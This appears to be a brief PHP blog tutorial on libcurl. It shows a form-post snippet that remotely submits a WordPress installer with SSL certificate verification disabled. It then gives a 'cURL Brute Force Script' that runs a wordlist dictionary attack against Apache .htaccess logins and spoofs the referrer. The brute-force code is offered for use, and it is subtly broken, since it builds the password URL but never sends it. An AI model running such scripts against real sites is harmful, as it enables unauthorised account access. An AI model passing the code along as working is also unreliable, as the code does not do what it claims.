libcurl is a free and easy-to-use client-side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS and FILE. libcurl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, Kerberos4), file transfer resume, http proxy tunneling and more!
PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols.
How to submit form post using cUrl?
Submit form post using cUrl is pretty simple.
$url = 'http://mydomain.com/'; $postdata = "Submit=Install%20WordPress&admin_email=" . $wp_admin_email . "&blog_public=1&weblog_title=" . $wp_title; $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $url . "wp-admin/install.php?step=2"); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt ($ch, CURLOPT_TIMEOUT, 60); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_COOKIEJAR, $cookie); curl_setopt ($ch, CURLOPT_REFERER, $url . "wp-admin/install.php"); curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata); curl_setopt ($ch, CURLOPT_POST, 1); $result = curl_exec ($ch); curl_close($ch);
I create this sample code to sent a post into wordpress install.php without open that page manually. It's mean I can sent a form post from outside of the target domain and display the result from my execute code.
Others thing that cUrl can do?
cURL Brute Force Script
The following cURL script can be used to brute force Apache .htaccess authentication:
$url = "http://www.example.com/admin/"; // Set the URL to be bruteforced
$ref = "http://www.example.com/index.php"; // Set the referrer to spoof
$denied = "Forbidden"; // Set the "Denied" output
$wordlist = "/var/www/wordlist.txt"; // Set the wordlist location
set_time_limit( 0 ); // Set script execution limit. 0 = no limit
$ch = curl_init( ); // Initialise cURL
curl_setopt( $ch, CURLOPT_URL, $url ); // Set URL as $url
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,1 ); // Set RETURNTRANSFER to TRUE
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION,1 ); // Set FOLLOWLOCATION to TRUE
foreach( file( $wordlist ) as $password ) // Start the loop for dictionary attack
{
$force = "http://admin:{$password}@www.example.com/admin/"; // Set the URL to attack,
curl_setopt( $ch, CURLOPT_URL, $url ); // Load the URL to attack with cURL
$check = curl_exec( $ch ); // Set params to check
if( !eregi( $denied, $check ) ) // Check to see if $denied is not in page
{
die( "Success! The password is: {$password}" ); // If $denied returns false, success
}
}
curl_close( $ch ); // Close the cURL process